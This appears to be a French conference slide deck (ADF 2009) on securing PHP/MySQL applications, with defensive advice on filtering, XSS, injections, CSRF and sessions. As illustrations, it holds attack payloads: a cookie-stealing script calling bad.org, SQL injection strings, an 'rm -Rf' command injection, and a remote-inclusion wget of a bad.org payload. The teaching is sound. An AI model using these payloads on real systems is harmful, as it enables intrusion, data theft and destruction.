adf 2009 - resinfocesar.resinfo.org/cours-prive/adf-012009/secu_php... · adf 2009 sécurisation...

ADF 2009 Sécurisation d’applications PHP/MySQL

Magali Contensin

[email protected]

Plan

1. Filtrer les entrées, protéger les sorties

2. Sécurité par l’obscurité

3. XSS 3. XSS

4. Injections

5. CSRF

6. Détournement de sessions

1. Filtrer entrées / protéger sorties

� Application web� entrées : données primaires et secondaires

� sortiesfichiers

SGBDApplication

Weben-tête

corps en-tête

corps

Requête HTTP

Réponse HTTP

sessions

env.

texte ou binaire


� Envoi de données par GET

□ Données placées dans

- URL

- cookies

GET /voyage.php?lieu=venise HTTP/1.1Host: www.vacances.frCookie: lang=fr;id=214535E1FAUser-Agent: Firefox

en-tête

corps

Requête HTTP GET

corps vide


� Envoi de données par GET


- URL

voyage.php?lieu=venise

- cookies- cookies

Cookie: lang=fr;id=214535E1FA

□Envoi provoqué par :

- action volontaire ou involontaire

- navigateur (récupération images, css, scripts, …)

- telnet port 80


GET /voyage.php?lieu=venise HTTP/1.1Host: www.vacances.frUser-Agent: FirefoxCookie: lang=fr;id=214535E1FA

$_GET

$_COOKIE

� Entrées d’un script PHP pour GET

$_SERVER


� Envoi de données par POST


- Corps

- URL

- cookies- cookies

POST /reservation.php?id=2 HTTP/1.1Host: www.vacances.frCookie: lang=fr;id=214535E1FAUser-Agent: FirefoxContent-Type: application/x-www-form-urlencoded

Content-Length: 11

lieu=venise

Requête HTTP POST

en-tête

corps


� Envoi de données par POST


- Corps lieu=venise

- URL reservation.php?id=2

- cookies Cookie: lang=fr;id=214535E1F- cookies Cookie: lang=fr;id=214535E1F

□ Envoi provoqué par :

- action volontaire ou involontaire

- telnet port 80



POST /reservation.php?id=25 HTTP/1.1Host: www.vacances.frUser-Agent: FirefoxCookie: lang=fr;id=214535E1FAContent-Type: application/x-www-form-urlencoded

Content-Length: 11

$_REQUEST

$_GET

$_COOKIE

$_POST

� Entrées d’un script PHP pour GET et POST

lieu=venise$_SERVER




Content-Length: 11

$_REQUEST

$_GET

$_COOKIE

$_POST

� Entrées d’un script PHP pour GET et POST

lieu=venise

POST

$_SERVER

$_FILES




Content-Length: 11

$_REQUEST

$_GET

$_COOKIE

$_POST

� Entrées d’un script PHP

lieu=venise

POST

$_SERVER

$_FILES

$_ENV




Content-Length: 11

$_REQUEST

$_GET

$_COOKIE

$_POST

� Entrées d’un script PHP

lieu=venise

POST

fichier

données secondaires

session

$_SERVER

$_FILES

$_ENV

$_SESSION


� Envoi de données malveillantes

□ Modification d’un formulaire

□ Modification de la query string

□ Requête forgée (telnet port 80, TamperData)□ Requête forgée (telnet port 80, TamperData)


� Implications

□ méthode HTTP différente de celle attendue

□ champs en-tête HTTP modifiés (User-Agent)

□ absence d’arguments attendus□ absence d’arguments attendus

□ arguments ajoutés

= nouvelles variables si register_globals = on

□ valeurs inattendues pour des arguments


� Données reçues peuvent être :

□ stockées dans SGBD, fichier, session

� XSS stocké

□ utilisées pour interroger un SGBD □ utilisées pour interroger un SGBD

� SQL Injection

□ utilisées pour exécuter un programme

�Injection de commandes

Ne jamais faire confiance aux données envoyées par le client


� Actions à entreprendre du côté du programmeur

□ Vérifier toute entrée

� Données à vérifier$_GET, $_POST, $_COOKIE, $_REQUEST, $_FILES, $_SERVER, $_ENV et $_SESSION $_ENV et $_SESSION

� Contrôles à effectuer

- type données : intval, ctype_*, cast

- présence des données attendues

- valeurs de nombres comprises entre deux bornes

- tailleMin < taille donnée < tailleMax

- jeu de caractères

- valeur null autorisée ou non

- select, radio, … : valeur comprise dans une liste




� Données à vérifier$_GET, $_POST, $_COOKIE, $_REQUEST, $_FILES, $_SERVER, $_ENV et $_SESSION $_ENV et $_SESSION

� Contrôles à effectuer

� Filtrage

- liste blanche :

Indique ce qui est autorisé

- liste noire :

Indique ce qui est interdit

A éviter car plus permissif




□ Protéger les données passées à un interpréteur

� Injections SQL : guillemets autour de la donnée� Injections SQL : guillemets autour de la donnéemysql_real_escape_string($data)

� Injection null dans les chaînes, regexp

� Injection de commande (exec, system, …)

escapeshellarg($data), escapeshellcommand($data)





□ Protéger les opérations sur les fichiers□ Protéger les opérations sur les fichiers

(file, readfile, unlink, include, upload, …)

� Vérification du chemin realpath($chemin)

� Suppression du chemin basename($chemin)<?php // script code.php

header("Content-type:text/plain");

$fichier = basename($_GET["p"]);

readfile($fichier);

?>

http://..../code.php?p=/etc/passwd






(file, readfile, unlink, include, upload, …)

� File upload

- Lire les données avec $_FILES

- Manipuler avec move_uploaded_file

- Renommer (ne pas utiliser le nom de fichier envoyé)

- Vérifier le type du fichier (interdit l’upload de scripts)






□ Filtrer les sorties vers le client

� Définir le jeu de caractères de la page

<meta http-equiv="Content-Type« content="text/html; charset=UTF-8"/>

� Coder les caractères spéciaux

htmlentities, htmlspecialchars(chaine, ENT_QUOTES)






□ Filtrer les sorties vers le client

□ Initialiser les variables

□ Récupérer les données par la méthode attendue

Ne pas utiliser : extract, $_REQUEST, register_globals à on


� Actions à entreprendre du côté administrateur

□ php.ini

� register_globals off

<?php // login.php

if (verifClient($_POST['login'], $_POST['passwd'])){

$ok = true ;

…

}

…

if ($ok){

…

}

?>

http://.../login.php?ok=1



□ php.ini

� register_globals off

� error_reporting E_ALL

� open_basedir arborescence_autorisee� open_basedir arborescence_autorisee

� allow_url_fopen off

� disable_functions liste_fonctions_interdites

� magic_quotes_gpc off



□ php.ini

□ fichier automatiquement inclus (auto_prepend_file) :foreach($_POST as $cle=>$val){

$_POST[$cle] = strip_tags($val);

}

□ mod_security

□ attention à AllowOverride All ou Options

autorise la modification de directives du php.ini dans un .htaccess

Plan



3. XSS 3. XSS

4. Injections

5. CSRF



� Informations données par ApacheServerSignature


� Informations données par ApacheServerTokens

HTTP/1.1 200 OKHTTP/1.1 200 OK

Date: Sat, 26 Apr 2008 22:54:37 GMT

Server: Apache/2.0.55 (Unix) PHP/4.4.2 mod_ssl/2.0.55 OpenSSL/0.9.7a

Connection: close

Content-Type: text/html

X-Powered-By: PHP/4.4.2

Connection closed by foreign host.


� Informations données par PHPexpose_php

▫ réponse HTTP

200 OKConnection: closeConnection: closeDate: Sat, 26 Apr 2008 23:00:03 GMTServer: ApacheContent-Type: text/htmlX-Powered-By: PHP/4.4.2



▫ réponse HTTP

▫ crédits

?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000



▫ réponse HTTP

▫ crédits

▫ images▫ images

?=PHPE9568F34-D428-11d2-A769-00AA001ACF42

?=PHPE9568F35-D428-11d2-A769-00AA001ACF42

?=PHPE9568F36-D428-11d2-A769-00AA001ACF42

2. Sécurité par l’obscurité� Informations données par PHP

expose_php

▫ réponse HTTP

▫ crédits

▫ images

ext/standard/info.h :

#define PHP_LOGO_GUID "PHPE9568F34-D428-11d2-A769-00AA001ACF42"#define PHP_EGG_LOGO_GUID "PHPE9568F36-D428-11d2-A769-00AA001ACF42"#define ZEND_LOGO_GUID "PHPE9568F35-D428-11d2-A769-00AA001ACF42"#define PHP_CREDITS_GUID "PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000"

2. Sécurité par l’obscurité� Informations données par l’extension .php

▫ Associer une autre extension

AddType application/x-httpd-php .asp

▫ Parser .html

AddType application/x-httpd-php .htm .htmlAddType application/x-httpd-php .htm .html

▫ Application par défaut

DefaultType application/x-httpd-php

▫ Réécriture

rewriteEngine on

rewriteRule (.+).html$ $1.php [L]

2. Sécurité par l’obscurité� Cookie de session

session.name

2. Sécurité par l’obscurité� Affichage des erreurs

Warning: sort() expects parameter 1 to be array, integer given in /web/CRFB/test.php on line 7

error_reporting

display_errorsdisplay_errors

display_startup_errors

log_errors

error_log

report_memleaks

track_errors

<Directory /web/CRFB/PagesPerso/magali/testerr>AllowOverride All

</Directory>

2. Sécurité par l’obscurité� Attention aux modif. dans le .htaccess

php_flag display_errors on.htaccess php_flag display_errors onphp_value directive valeur

.htaccess

PHP_INI_PERDIR register_globals, variables_order, register_long_arrays, auto_append_files, auto_prepend_files, magic_quotes_gpc, post_max_size, upload_max_filesize, short_open_tags, asp_tags

PHP_INI_ALL

2. Sécurité par l’obscurité� Attention aux modif. dans le .htaccess

<Directory /web/CRFB/PagesPerso/magali/testerr>AllowOverride All

</Directory>

php_flag display_errors on.htaccess php_flag display_errors onphp_value upload_max_filesize 900M

.htaccess

php_admin_flag display_errors onphp_admin_value upload_max_filesize 10M

2. Sécurité par l’obscurité� Informations données par des fichiers non

protégés sur le serveur

http://www.vacances.fr/login.php~

<?php

echo "bonjour ", $_GET['nom'];

...

?>

2. Sécurité par l’obscurité� Informations données par des fichiers non

protégés sur le serveur


� Informations données par des fichiers non protégés sur le serveur

<Files ~ "^\.ht|~$">Order allow,deny RedirectMatch 404 ~$

RedirectMatch 404 \.htaccessDeny from all</Files>

RedirectMatch 404 \.htaccess


� Informations données par les listings

<Directory "/web/CRFB/">Options ExecCGI Indexes

</Directory>


� Informations données par les logiciels


� Informations données par les logiciels▫ restreindre accès (.htaccess ou sessions)

▫ configurer pour une info minimale

▫ interdire les fonctions php (disable_functions)

php_uname, phpversion, mysql_get_server_infophp_uname, phpversion, mysql_get_server_info


� Informations données par php

disable_functions = "phpinfo"

2. Sécurité par l’obscurité� Code source <?php show_source($_GET['fichier']) ?>

2. Sécurité par l’obscurité� Code source

disable_functions = "show_source, highlight_file"

open_basedir = "/web/:/tmp/"

2. Sécurité par l’obscurité� Code source

http://crfbtest.univ-mrs.fr/~magali/test.phps

# AddType application/x-httpd-php-source .phpsAddType application/x-httpd-php .php .php3 .php4 .phpsRedirectMatch 404 \.phps$

� Masquer Apache ▫ Apache 1.3 modifier httpd.h#define SERVER_BASEPRODUCT "Apache“

#define SERVER_BASEREVISION "1.3.34"

▫ Apache 2.0 modifier ap_release.h


▫ Apache 2.0 modifier ap_release.h#define AP_SERVER_BASEVENDOR "Apache Software Foundation"

#define AP_SERVER_BASEPRODUCT "Apache"

#define AP_SERVER_MAJORVERSION_NUMBER 2

#define AP_SERVER_MINORVERSION_NUMBER 0

#define AP_SERVER_PATCHLEVEL_NUMBER 58


User-agent: *Disallow: /cgi-bin/

� Interdire l’indexation

� fichier robots.txt

Disallow: /cgi-bin/Disallow: /docs/

2. Sécurité par l’obscurité� Interdire la mise en cache de données

dans le navigateur

� Complétion formulaires

<form action="valider.php"

method="POST">

<form action="valider.php"

AUTOCOMPLETE="off"

method="POST">

2. Sécurité par l’obscurité� Interdire la mise en cache de données

dans le navigateur

� Complétion formulaires

� Page web

� Pragma:no-cache HTTP/1.0� Pragma:no-cache HTTP/1.0

� Cache-control:no-cache HTTP/1.1

� Expires

header("Cache-Control: no-cache");

header("Pragma: no-cache");

header("Expires: Thu, 01 Jan 1970 00:00:00 GMT");

2. Sécurité par l’obscurité� Masquer les données de connexion SGBD

� httpd.conf

<Directory "/web/CRFB/PagesPerso/magali/testSIARS">

Include /home/magali/connexion.txt

</Directory>

SetEnv dbLogin "magali"

SetEnv dbPass "m2pasmag"

SetEnv dbBd "ma_base"

SetEnv dbHost "127.0.0.1"

<?php echo $_SERVER['dbLogin']; ?>

<?php system('cat /home/magali/connexion.txt'); ?>


� httpd.conf

� .htaccess


� httpd.conf

� .htaccess

� directives php� mysql.default_user� mysql.default_user

� mysql.default_password

� mysql.default_port

� mysql.default_host

get_cfg_var("mysql.default_password");

Plan



3. Protection contre le XSS3. Protection contre le XSS

4. Injections

5. CSRF


3. Protection contre le XSS� Attaque Stockée sur le serveur web

� XSS envoyé par le pirate

Smith<script src=http://bad.org/c.js></script>nom

[email protected] Smith <scriptsrc=http://bad.org/c.js></script>

SGBD

XSS

XSS

Application Web

<?php

import_request_variables('g', 'f_');

$req = "INSERT INTO users (nom, mail)

VALUES ('$f_nom', '$f_mail')" ;

$res = mysql_query($req) or

die("Erreur");

echo "donnees inserees";

?>

Erreur 1 :

pas de vérification

des entrées

</script>

1

2

3


� l’accès à une ressource provoque l’envoi du XSS au navigateur

XSS

admin.

Application GET liste_inscrits.php1

Smith <scriptsrc=http://bad.org/c.js></script>

SGBD

Application Web

3

2

XSS

<?php

$req = "SELECT nom, mail FROM users";

$res = mysql_query($req) or die("Erreur");

while ($ligne = mysql_fetch_assoc($res)){

echo $ligne['nom']," ",$ligne['mail'],"<br>";

}

?>

Erreur 2 :

pas de protection

des sorties

Smith <script src=http://bad.org/c.js></script> [email protected]<br>


� le XSS est exécuté par le navigateur

XSS

admin.

Application GET liste_inscrits.php1

Smith <scriptsrc=http://bad.org/c.js></script>

SGBD

GET http://bad.org/c.js

document.write(‘<img src=http://bad.org/c.php?’+document.cookie+’ width=1>’)

Application Web

32XSS

c.js

4

GET http://bad.org/c.php?idsess=a2345effb9ccd78

5

vol de session idsess=a2345effb9ccd78 6

bad.org

3. Protection contre le XSS

� Actions à entreprendre□ Filtrer les entrées (par liste blanche)

éventuellement utiliser utf8_decode et strip_tags

□ Préciser le jeu de caractères

□ Protéger les sorties (htmlentities, htmlspecialchars)□ Protéger les sorties (htmlentities, htmlspecialchars)<?php

$req = "SELECT nom, mail FROM users";

$res = mysql_query($req) or die("Erreur");

while ($ligne = mysql_fetch_assoc($res)){

echo htmlentities($ligne['nom'], ENT_QUOTES),

" ",

htmlentites($ligne['mail'], ENT_QUOTES),

"<br>";

}

?>

Smith <script src=http://bad.org/c.js></script> [email protected]<br>

Plan



3. Protection contre le XSS 3. Protection contre le XSS

4. Protection contre les Injections

5. CSRF


POST http://.../cnx.php HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Content-Length: 24

1

' OR 1 = 1 --

� SQL

4. Protection contre les injectionsmagic_quotes_gpc = off

login=%27+OR+1+=+1+--%20

Application Web

<?php

...

$login = $_POST['login'];

$pwd = $_POST['passwd'];

$req = "SELECT login, prenom FROM utilisateur

WHERE login='$login' AND password='$pwd'";

$result = mysql_query($req) or exit("Erreur");

if (mysql_num_rows($result) == 0){

die("erreur d'authentification ");

}

$ligne = mysql_fetch_assoc($result);

echo "bonjour ", $ligne['prenom'], " !";

?>

2



Content-Length: 24

1

' OR 1 = 1 --

� SQL

4. Protection contre les injectionsmagic_quotes_gpc = off

login=%27+OR+1+=+1+--%20

Application Web

SELECT login, prenom FROM utilisateur

WHERE login='' OR 1 = 1 -- ' AND password=''2

SGBD


� SQL - actions à entreprendre côté programmeur□ protéger les données avec mysql_real_escape_string

<?php

...

$login = $_POST['login'];


$req = "SELECT login, prenom FROM utilisateur

mysql_real_escape_string $login).

SELECT login, prenom FROM utilisateur WHERE login='\' OR 1 = \'1 LIMIT 1,1 -- ' AND password='';

WHERE login='" . mysql_real_escape_string($login).

"' AND password='" . mysql_real_escape_string($pwd) . "'";

$result = mysql_query($req) or exit("Erreur");

if (mysql_num_rows($result) == 0){

die("erreur d'authentification ");

}

$ligne = mysql_fetch_assoc($result);

echo "bonjour ", $ligne['prenom'], " !";

?>

' OR 1 = 1 LIMIT 1,1 --



□ filtrer les entrées : taille, type, ...

□ cast des nombres ou mettre des ' ' autour des nombres

$req = "UPDATE commande SET quantite = $nb WHERE ref=$ref";

?ref=21&nb=5,%20desc=LOAD%20INFILE('/etc/passwd')

UPDATE commande SET quantite=5, desc=LOAD INFILE('/etc/passwd')

WHERE ref=21



□ filtrer les entrées : taille, type, ...

□ cast des nombres ou mettre des ' ' autour des nombres

□ utiliser des requêtes préparées

$log = $_POST['login'];$log = $_POST['login'];


// connexion

$db = new mysqli(IP, LOGIN, PASS, DB, PORT) or die('echec');

// preparer la requete

$req = "SELECT prenom, mail FROM users WHERE login=? AND password=?";

$prep = $db->prepare($req) or die ('pb');

$prep->bind_param("ss", $log, $pwd); // lier les 2 var. de type string

$prep->execute();

$prep->bind_result($prenom, $mail); // lier les colonnes aux var.

$prep->fetch() ;

echo "bonjour ", htmlentities($prenom), " votre mail est ", htmlentities($mail);

$prep->close();

// deconnexion

$db->close();


� SQL - actions à entreprendre côté admin.□ magic_quotes_gpc

□ aucun affichage d’erreur sur un serveur en production

□ privilèges restreints pour le compte mysql utilisé pour le web

□ plusieurs instances de mysql avec mysqld_multi

□ protéger les connexions entre le serveur web et le serveur SGBD□ protéger les connexions entre le serveur web et le serveur SGBD

� Commandes

/listing.php?ext=php;cd/;rm+-Rf+* ls -1 *.php;cd/;rm+-Rf+*

<?php

echo system("ls -1 *.".$_GET['ext']);

?>

listing.php


/listing.php?ext=php;cd/;rm+-Rf+*

cnx.php

index.php

connectBase.php

listing.php

ls -1 *.php;cd/;rm+-Rf+*1

2

3

4

/

5


� Commandes - actions à entreprendre

□ Développeur

□ Filtrer les entréesif (!ctype_alpha($ext)){

die("argument non valide");

}}

□ Protéger des méta-caractères (escapeshellcmd, escapeshellarg)

□ Administrateur

□ Désactiver si possible system, exec, shell_exec (disable_functions)

<?php

� Code (RFI – Remote File Inclusion)

3

exec

bad.txt

5


bad.org

<?php

echo system('cd /tmp; ls;

wget http://bad.org/exec; ls');

?>GET bad.txt

1

2

test.php

<?php

require($_GET['p'].".php");

?>

wget http://bad.org/exec4

/tmp

test.php?p=http://bad.org/bad.txt%00

<?php

echo system('cd /tmp; ls;

wget http://bad.org/exec; ls');

?>


� Code - actions à entreprendre

□ Développeur

□ Filtrer les entrées

□ Chemin : utiliser basename, realpath

□ Protéger des méta-caractères (escapeshellcmd, escapeshellarg)□ Protéger des méta-caractères (escapeshellcmd, escapeshellarg)

□ Administrateur

□ Désactiver si possible eval (disable_functions)

□ allow_url_fopen à off (allow_url_include depuis PHP 5.2.0)

□ Utiliser curl

□ Fixer le répertoire d’inclusion avec open_basedir

□ Filtrer les connexions sortantes sur le pare-feu

<?php

$fichier = basename($_GET['nom']);

readfile($fichier.".txt");

?> ?nom=nom_script.php%00


� Null injection (caractère \0)

<?php<?php

if (preg_match("/[^A-Za-z]/", $_GET['chaine'])){

die('erreur');

} else{

echo 'ok';

} ?chaine=test1

?> ?chaine=%00test1

□ Actions à entreprendre

□ Filtrer les entrées (méthode liste blanche)

Plan



3. XSS 3. XSS

4. Injections

5. CSRF


<img

src='article.php?id=3&action=del'

width='0'>

SGBD1

5. Protection contre le CSRF

…

<img src='article.php?id=3&action=del'

width='0'>

…

Ajouter un commentaire

GET http://.../article.php?id=3&action=del

membre d’un site protégé

1

2

membre d’un site protégé

GET article.php?id=3&action=read

<img src='article.php?id=3&action=del' width='0'>

3

4

5. Protection contre le CSRF

� Actions à entreprendre

□ Majorité des attaques = méthode GET

□ Utiliser POST si mise à jour de données

□ Ne pas utiliser $_REQUEST pour récupérer les données

=> Protège contre les attaques menées par GET

□ Attaques utilisant POST

□ Forcer l’utilisation du formulaire du site (idée s’assurer que les données reçues par POST proviennent bien d’un formulaire envoyé par le site)

=> Utiliser un identifiant aléatoire pour chaque formulaire, stocké en session avec un délai de validité

Plan



3. XSS 3. XSS

4. Injections

5. CSRF


� Détourner une session = fournir un id valide

login=zorro&passwd=paszorro1

6. Protection contre le vol de session

login=zorro&passwd=paszorro

sessid=21000 Bonjour Zorro

sessid=21000 article=12&action=voir

1

2

3

sessid=21000 article=5&action=supprimer

� Détourner une session = fournir un id valide

� Identifiant transmis par cookie, URL, champ form.

� Attaques pour obtenir un identifiant valide

� Prédiction (id = nombre entier incrémenté)


� Force brute

� Fixation

� Vol

o id dans l’URL (historique, bookmark, logs, envoi par mail, …)

o vol de cookie (XSS, ordinateur public)

o interception (écoute réseau)

o consultation des fichiers de session sur le serveur


� Actions à entreprendre

□ Développeur

□ Générer un nouvel id de session après identification (session_regenerate_id)

□ Limiter la durée de validité d’une session

□ Utiliser un 2ème moyen de suivi de session (User-Agent)

□ Toujours proposer une déconnexion

□ Utiliser les identifiants de session PHP

□ Administrateur

□ session.use_only_cookies

□ SSL

□ protéger les fichiers de session (stocker dans SGBD, utiliser open_basedir)

� Top 25 Most Dangerous Programming Errors http://cwe.mitre.org/top25

� WASC (Web Application Security Consortium)

http://www.webappsec.org/projects/threat/classes_of_attack.shtml

� OWASP (Open Web Application Security Project)

Sur Internet

� OWASP (Open Web Application Security Project)

http://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project

http://www.owasp.org/index.php/Category:OWASP_Guide_Project

� CERTA (Centre d’Expertise Gouvernemental de Réponse

et de Traitement des Attaques Informatiques)

http://www.certa.ssi.gouv.fr

� CERT (Computer Emergency Response Team)

http://www.cert.org

adf 2009 - resinfocesar.resinfo.org/cours-prive/adf-012009/secu_php... · adf 2009 sécurisation...

Documents